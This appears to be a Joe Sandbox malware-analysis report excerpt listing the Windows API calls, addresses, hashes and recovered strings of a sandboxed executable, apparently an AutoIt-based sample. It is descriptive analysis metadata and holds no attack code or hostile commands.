                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize_wcslen
                                                                    • String ID:
                                                                    • API String ID: 429561992-0
                                                                    • Opcode ID: 18a8a4b7a482d2ec60922089ebda865a796e540831b606cdafd978ba0836438a
                                                                    • Instruction ID: eeecf090df5bd493aca17869421e9f1c0981b5a9cb500d2a485eee48661e4e56
                                                                    • Opcode Fuzzy Hash: 18a8a4b7a482d2ec60922089ebda865a796e540831b606cdafd978ba0836438a
                                                                    • Instruction Fuzzy Hash: B2C125B1608305AFD700DF68C88492BBBE9FF89744F14891DF98A9B251D731EE45CB52
                                                                    APIs
                                                                    • CoInitialize.OLE32(00000000), ref: 00957AF3
                                                                    • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 00957B8F
                                                                    • SHGetDesktopFolder.SHELL32(?), ref: 00957BA3
                                                                    • CoCreateInstance.OLE32(0097FD08,00000000,00000001,009A6E6C,?), ref: 00957BEF
                                                                    • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 00957C74
                                                                    • CoTaskMemFree.OLE32(?,?), ref: 00957CCC
                                                                    • SHBrowseForFolderW.SHELL32(?), ref: 00957D57
                                                                    • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00957D7A
                                                                    • CoTaskMemFree.OLE32(00000000), ref: 00957D81
                                                                    • CoTaskMemFree.OLE32(00000000), ref: 00957DD6
                                                                    • CoUninitialize.OLE32 ref: 00957DDC
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize
                                                                    • String ID:
                                                                    • API String ID: 2762341140-0
                                                                    • Opcode ID: 04faf48eefa473bd7cd53d2b3a345ddced6f7f0f858bfb53426889dbc357f04f
                                                                    • Instruction ID: cdf42c23b0d598ea32007278ce1e18d03305193d9eabe44192bee8f1a3086595
                                                                    • Opcode Fuzzy Hash: 04faf48eefa473bd7cd53d2b3a345ddced6f7f0f858bfb53426889dbc357f04f
                                                                    • Instruction Fuzzy Hash: C5C12B75A04209AFCB14DFA5D884DAEBBF9FF48305B148499E81ADB361D730EE45CB90
                                                                    APIs
                                                                    • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00975504
                                                                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00975515
                                                                    • CharNextW.USER32(00000158), ref: 00975544
                                                                    • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00975585
                                                                    • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 0097559B
                                                                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 009755AC
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$CharNext
                                                                    • String ID:
                                                                    • API String ID: 1350042424-0
                                                                    • Opcode ID: bd5101f14bdd6c13cb6c5fc6791e76bf527444c2e9272d8cfddc24fc9f9fb612
                                                                    • Instruction ID: db4edbe1d2fdb4753202b19e0dfb16fc417fa7965ea901f555159bdf6ea00e01
                                                                    • Opcode Fuzzy Hash: bd5101f14bdd6c13cb6c5fc6791e76bf527444c2e9272d8cfddc24fc9f9fb612
                                                                    • Instruction Fuzzy Hash: 7F61C072904609EFDF508F50CC84AFE7BB9FF05720F518549F629A62A0D7B49A80DB60
                                                                    APIs
                                                                    • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 0093FAAF
                                                                    • SafeArrayAllocData.OLEAUT32(?), ref: 0093FB08
                                                                    • VariantInit.OLEAUT32(?), ref: 0093FB1A
                                                                    • SafeArrayAccessData.OLEAUT32(?,?), ref: 0093FB3A
                                                                    • VariantCopy.OLEAUT32(?,?), ref: 0093FB8D
                                                                    • SafeArrayUnaccessData.OLEAUT32(?), ref: 0093FBA1
                                                                    • VariantClear.OLEAUT32(?), ref: 0093FBB6
                                                                    • SafeArrayDestroyData.OLEAUT32(?), ref: 0093FBC3
                                                                    • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 0093FBCC
                                                                    • VariantClear.OLEAUT32(?), ref: 0093FBDE
                                                                    • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 0093FBE9
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                                    • String ID:
                                                                    • API String ID: 2706829360-0
                                                                    • Opcode ID: 4fc4d15c035b8898abb8bf8fee294320ed71a29ea65dd25dff6742f6c70c0cce
                                                                    • Instruction ID: 167dcb07f6a5b366e233ecfe48edd4c58484b52e796e228bc7ff4a17ac0e3935
                                                                    • Opcode Fuzzy Hash: 4fc4d15c035b8898abb8bf8fee294320ed71a29ea65dd25dff6742f6c70c0cce
                                                                    • Instruction Fuzzy Hash: 04414F75E04219AFCB00DF68D8689AEBBB9FF48344F008069E959E7261DB34A945CF90
                                                                    APIs
                                                                    • GetKeyboardState.USER32(?), ref: 00949CA1
                                                                    • GetAsyncKeyState.USER32(000000A0), ref: 00949D22
                                                                    • GetKeyState.USER32(000000A0), ref: 00949D3D
                                                                    • GetAsyncKeyState.USER32(000000A1), ref: 00949D57
                                                                    • GetKeyState.USER32(000000A1), ref: 00949D6C
                                                                    • GetAsyncKeyState.USER32(00000011), ref: 00949D84
                                                                    • GetKeyState.USER32(00000011), ref: 00949D96
                                                                    • GetAsyncKeyState.USER32(00000012), ref: 00949DAE
                                                                    • GetKeyState.USER32(00000012), ref: 00949DC0
                                                                    • GetAsyncKeyState.USER32(0000005B), ref: 00949DD8
                                                                    • GetKeyState.USER32(0000005B), ref: 00949DEA
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: State$Async$Keyboard
                                                                    • String ID:
                                                                    • API String ID: 541375521-0
                                                                    • Opcode ID: cbf40bca3d369b864f09c2624ee68957303565ef5c6c5f14602760491a607422
                                                                    • Instruction ID: e419e3e6dfeb070023e542e9cef2bb30e508e38da1a8c11a6b9ba71a0db88330
                                                                    • Opcode Fuzzy Hash: cbf40bca3d369b864f09c2624ee68957303565ef5c6c5f14602760491a607422
                                                                    • Instruction Fuzzy Hash: 6641ED749087C96DFF319B60C844BB7BEE86F11344F04805EE6CA576C2D7A599C4C792
                                                                    APIs
                                                                    • WSAStartup.WSOCK32(00000101,?), ref: 009605BC
                                                                    • inet_addr.WSOCK32(?), ref: 0096061C
                                                                    • gethostbyname.WSOCK32(?), ref: 00960628
                                                                    • IcmpCreateFile.IPHLPAPI ref: 00960636
                                                                    • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 009606C6
                                                                    • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 009606E5
                                                                    • IcmpCloseHandle.IPHLPAPI(?), ref: 009607B9
                                                                    • WSACleanup.WSOCK32 ref: 009607BF
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                                    • String ID: Ping
                                                                    • API String ID: 1028309954-2246546115
                                                                    • Opcode ID: 5ebd67d5e334cb6967f17e8c5c84395cfaa85e8ef0ed769f20a8482f35b008c4
                                                                    • Instruction ID: 3cfb6cedb31e3142c09fb169f04dcce0ebbf1a5862989ad2b3ecc8755de1006a
                                                                    • Opcode Fuzzy Hash: 5ebd67d5e334cb6967f17e8c5c84395cfaa85e8ef0ed769f20a8482f35b008c4
                                                                    • Instruction Fuzzy Hash: 0C918C756082419FD320CF19D889F1ABBE4FF84318F1485A9F46A8B6A2C730ED41CF92
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: _wcslen$BuffCharLower
                                                                    • String ID: cdecl$none$stdcall$winapi
                                                                    • API String ID: 707087890-567219261
                                                                    • Opcode ID: d39730fa5acb8b53a39dfc673d539e760bd85f697f1ac1a7c42a5e668142452e
                                                                    • Instruction ID: 46e879857f17c399457b43c38231ea2a83a661c1a97b8a17c3b0dcda21daca62
                                                                    • Opcode Fuzzy Hash: d39730fa5acb8b53a39dfc673d539e760bd85f697f1ac1a7c42a5e668142452e
                                                                    • Instruction Fuzzy Hash: A251BF72A001169BCF24EF6CC9509BFB7A9BF65724B204729E966E72C0DB35DD40C7A0
                                                                    APIs
                                                                    • CoInitialize.OLE32 ref: 00963774
                                                                    • CoUninitialize.OLE32 ref: 0096377F
                                                                    • CoCreateInstance.OLE32(?,00000000,00000017,0097FB78,?), ref: 009637D9
                                                                    • IIDFromString.OLE32(?,?), ref: 0096384C
                                                                    • VariantInit.OLEAUT32(?), ref: 009638E4
                                                                    • VariantClear.OLEAUT32(?), ref: 00963936
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize
                                                                    • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                                    • API String ID: 636576611-1287834457
                                                                    • Opcode ID: c1a8356646d906c43fbc11e8a122aa3587163c4d2d32e3473dc7229ed808f4db
                                                                    • Instruction ID: 83d60fbbb1cb757801e59c3a170467d22e4a31e9652a08cf7e08e47b3d4d8b06
                                                                    • Opcode Fuzzy Hash: c1a8356646d906c43fbc11e8a122aa3587163c4d2d32e3473dc7229ed808f4db
                                                                    • Instruction Fuzzy Hash: 17619071608311AFD310DF65C849FAABBE8EF89714F10881DF9859B291D770EE48CB92
                                                                    APIs
                                                                    • LoadStringW.USER32(00000066,?,00000FFF,?), ref: 009533CF
                                                                      • Part of subcall function 008E9CB3: _wcslen.LIBCMT ref: 008E9CBD
                                                                    • LoadStringW.USER32(00000072,?,00000FFF,?), ref: 009533F0
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: LoadString$_wcslen
                                                                    • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
                                                                    • API String ID: 4099089115-3080491070
                                                                    • Opcode ID: 3ae6aa2b1a9cee16300b683a7e8cb53d431a6a39cb8af169fd36d8b48293e3e9
                                                                    • Instruction ID: cd2287326320a41b52aeff50f4a3cd094614ba81fb9e81b70c64779308b5517b
                                                                    • Opcode Fuzzy Hash: 3ae6aa2b1a9cee16300b683a7e8cb53d431a6a39cb8af169fd36d8b48293e3e9
                                                                    • Instruction Fuzzy Hash: D051DF32800249AADF15EBA5CD46EEEB7B8FF45340F244165F509B20A2EB312F58DB61
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: _wcslen$BuffCharUpper
                                                                    • String ID: APPEND$EXISTS$KEYS$REMOVE
                                                                    • API String ID: 1256254125-769500911
                                                                    • Opcode ID: 90643c22bfe11775bb45af2f2c34a4fc87683c4e3bafb0e2f64b286ca0c87c3e
                                                                    • Instruction ID: 06569ac1300098ff4f1c8b0337d24794073b5a2707730e5e3eff7002e96c5a76
                                                                    • Opcode Fuzzy Hash: 90643c22bfe11775bb45af2f2c34a4fc87683c4e3bafb0e2f64b286ca0c87c3e
                                                                    • Instruction Fuzzy Hash: AC41EC32A011279BCB205F7DC8909BE77A9BFA1B74B264529E921DB284E735CD81C790
                                                                    APIs
                                                                    • SetErrorMode.KERNEL32(00000001), ref: 009553A0
                                                                    • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 00955416
                                                                    • GetLastError.KERNEL32 ref: 00955420
                                                                    • SetErrorMode.KERNEL32(00000000,READY), ref: 009554A7
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: Error$Mode$DiskFreeLastSpace
                                                                    • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                                    • API String ID: 4194297153-14809454
                                                                    • Opcode ID: cd10d6c01fd75c0c523ee032216a7551e962e201e109a482687eb14441855181
                                                                    • Instruction ID: 8b8b41149fcb1a22b1ebc98a8acc72f711b7373e802ce52645c2813b9bfaf0fb
                                                                    • Opcode Fuzzy Hash: cd10d6c01fd75c0c523ee032216a7551e962e201e109a482687eb14441855181
                                                                    • Instruction Fuzzy Hash: 4231D675A006049FD710DF6AC894BA97BF8FF45306F198069E805CB2A3D771DD8ACB91
                                                                    APIs
                                                                    • CreateMenu.USER32 ref: 00973C79
                                                                    • SetMenu.USER32(?,00000000), ref: 00973C88
                                                                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00973D10
                                                                    • IsMenu.USER32(?), ref: 00973D24
                                                                    • CreatePopupMenu.USER32 ref: 00973D2E
                                                                    • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00973D5B
                                                                    • DrawMenuBar.USER32 ref: 00973D63
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: Menu$CreateItem$DrawInfoInsertPopup
                                                                    • String ID: 0$F
                                                                    • API String ID: 161812096-3044882817
                                                                    • Opcode ID: a528df7c2b759bf3b666855ab6d8d40a652b581be3822cb771c8b6a19420fb2c
                                                                    • Instruction ID: f78824ba80dc3afde11b800d0535cb077fb062869742d0dafa014b9054a7955b
                                                                    • Opcode Fuzzy Hash: a528df7c2b759bf3b666855ab6d8d40a652b581be3822cb771c8b6a19420fb2c
                                                                    • Instruction Fuzzy Hash: 04417F76615205EFDB24CF54D844ADA77B9FF89350F14802CF94A973A0D771AA10EF90
                                                                    APIs
                                                                      • Part of subcall function 008E9CB3: _wcslen.LIBCMT ref: 008E9CBD
                                                                      • Part of subcall function 00943CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00943CCA
                                                                    • SendMessageW.USER32(?,0000018C,000000FF,00020000), ref: 00941F64
                                                                    • GetDlgCtrlID.USER32 ref: 00941F6F
                                                                    • GetParent.USER32 ref: 00941F8B
                                                                    • SendMessageW.USER32(00000000,?,00000111,?), ref: 00941F8E
                                                                    • GetDlgCtrlID.USER32(?), ref: 00941F97
                                                                    • GetParent.USER32(?), ref: 00941FAB
                                                                    • SendMessageW.USER32(00000000,?,00000111,?), ref: 00941FAE
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$CtrlParent$ClassName_wcslen
                                                                    • String ID: ComboBox$ListBox
                                                                    • API String ID: 711023334-1403004172
                                                                    • Opcode ID: 310d6ba5ce60d674b300995eaa0ac2a5191b2124dc4e7d90ebd42582a34eecc5
                                                                    • Instruction ID: 665ea29430687937b38abb1b22c6e562c8d3e7294c4a79900f0b1998ac4215c3
                                                                    • Opcode Fuzzy Hash: 310d6ba5ce60d674b300995eaa0ac2a5191b2124dc4e7d90ebd42582a34eecc5
                                                                    • Instruction Fuzzy Hash: 5021D471A00214BBCF04AFA4CC85EEEBBB8EF06310F104559F9A5A72A1DB755989DB60
                                                                    APIs
                                                                    • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00973A9D
                                                                    • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00973AA0
                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00973AC7
                                                                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00973AEA
                                                                    • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00973B62
                                                                    • SendMessageW.USER32(?,00001074,00000000,00000007), ref: 00973BAC
                                                                    • SendMessageW.USER32(?,00001057,00000000,00000000), ref: 00973BC7
                                                                    • SendMessageW.USER32(?,0000101D,00001004,00000000), ref: 00973BE2
                                                                    • SendMessageW.USER32(?,0000101E,00001004,00000000), ref: 00973BF6
                                                                    • SendMessageW.USER32(?,00001008,00000000,00000007), ref: 00973C13
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$LongWindow
                                                                    • String ID:
                                                                    • API String ID: 312131281-0
                                                                    • Opcode ID: 95d1c6d4556be9fe8f437fe3743979895b939ced4d7d5f9c61aad2e3cec51f9b
                                                                    • Instruction ID: da4121b6eb043b2d8913baec635d32ed4a9e6ae32e6895d1b8f29f763565f32b
                                                                    • Opcode Fuzzy Hash: 95d1c6d4556be9fe8f437fe3743979895b939ced4d7d5f9c61aad2e3cec51f9b
                                                                    • Instruction Fuzzy Hash: 32619D72900248AFDB11DFA8CD81EEE77B8EF49710F148159FA19A7291C770AE41EB50
                                                                    APIs
                                                                    • GetCurrentThreadId.KERNEL32 ref: 0094B151
                                                                    • GetForegroundWindow.USER32(00000000,?,?,?,?,?,0094A1E1,?,00000001), ref: 0094B165
                                                                    • GetWindowThreadProcessId.USER32(00000000), ref: 0094B16C
                                                                    • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,0094A1E1,?,00000001), ref: 0094B17B
                                                                    • GetWindowThreadProcessId.USER32(?,00000000), ref: 0094B18D
                                                                    • AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,0094A1E1,?,00000001), ref: 0094B1A6
                                                                    • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,0094A1E1,?,00000001), ref: 0094B1B8
                                                                    • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,0094A1E1,?,00000001), ref: 0094B1FD
                                                                    • AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,0094A1E1,?,00000001), ref: 0094B212
                                                                    • AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,0094A1E1,?,00000001), ref: 0094B21D
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                                    • String ID:
                                                                    • API String ID: 2156557900-0
                                                                    • Opcode ID: 45e3b89b6b6973debd56d153f1500a3ce9b9dc9690211d7a551c24c0b8bd628a
                                                                    • Instruction ID: 0cf3dbd4bf576384e707974bc5eb6fed9eae98ce8a4ad620338def36857801da
                                                                    • Opcode Fuzzy Hash: 45e3b89b6b6973debd56d153f1500a3ce9b9dc9690211d7a551c24c0b8bd628a
                                                                    • Instruction Fuzzy Hash: 1B31CCB2568208BFDB20EF24DD98F6D7BADBF65721F108109FA14D6190D7B4DA809F60
                                                                    APIs
                                                                    • _free.LIBCMT ref: 00912C94
                                                                      • Part of subcall function 009129C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0091D7D1,00000000,00000000,00000000,00000000,?,0091D7F8,00000000,00000007,00000000,?,0091DBF5,00000000), ref: 009129DE
